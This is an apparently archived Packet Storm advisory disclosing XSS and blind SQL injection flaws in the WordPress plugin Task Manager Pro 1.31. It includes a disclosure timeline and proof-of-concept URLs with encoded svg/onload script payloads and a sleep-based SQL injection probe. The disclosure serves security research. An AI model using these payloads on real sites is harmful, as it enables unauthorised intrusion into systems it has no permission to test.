WordPress Task Manager Pro 1.31 Cross Site Scripting

2017-07-19T00:00:00
ID PACKETSTORM:143419
Type packetstorm
Reporter 8bitsec
Modified 2017-07-19T00:00:00

Description

                                        
                                            `# Exploit Title: WordPress Task Manager Pro 1.31 - Multiple vulnerabilities  
# Date: 2017-07-11  
# Exploit Author: 8bitsec  
# Vendor Homepage: https://www.w3bd.com/  
# Software Link: http://codecanyon.net/item/task-manager-pro-all-in-one-project-based-task-management-plugin-for-wordrpress/19864872  
# Version: 1.31  
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.5]  
# Email: contact@8bitsec.io  
# Contact: https://twitter.com/_8bitsec  
  
Release Date:  
=============  
2017-07-11  
  
Product & Service Introduction:  
===============================  
Task Manager Pro is a full and functional task management plugin for wordpress.  
  
Vulnerability Disclosure Timeline:  
==================================  
2017-07-10: Found the vulnerabilities.  
2017-07-10: Reported to vendor.  
2017-07-11: No response.  
2017-07-11: Published.  
  
Technical Details & Description:  
================================  
  
Multiple authenticated XSS vulnerabilities found logged as a low privileged user.  
  
Blind SQL Injection on task-details page task parameter.  
  
Proof of Concept (PoC):  
=======================  
  
Authenticated Stored XSS:  
  
Logged as a follower, the lowest privileged user.  
Write the payload in the 'Add a comment' section  
  
Authenticated Reflected XSS  
  
On task-edit, task-details, project-details pages:  
  
https://localhost/wp-admin/admin.php?page=task-edit&task=8%2F%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E  
https://localhost/wp-admin/admin.php?page=task-details&task=6%22%2F%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E  
https://localhost/wp-admin/admin.php?page=project-details&project=%22%2F%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E  
  
Authenticated Stored XSS  
  
Logged as a user with edit privileges:  
Edit Task Section. Task Name & Time Estimation fields are vulnerable.  
  
Blind SQL Injection  
  
Logged as a follower:  
# 6 and sleep(1) and 1=1  
https://localhost/wp/wp-admin/admin.php?page=task-details&task=6+and+sleep(1)+and+1%3D1  
  
Credits & Authors:  
==================  
8bitsec - [https://twitter.com/_8bitsec]  
`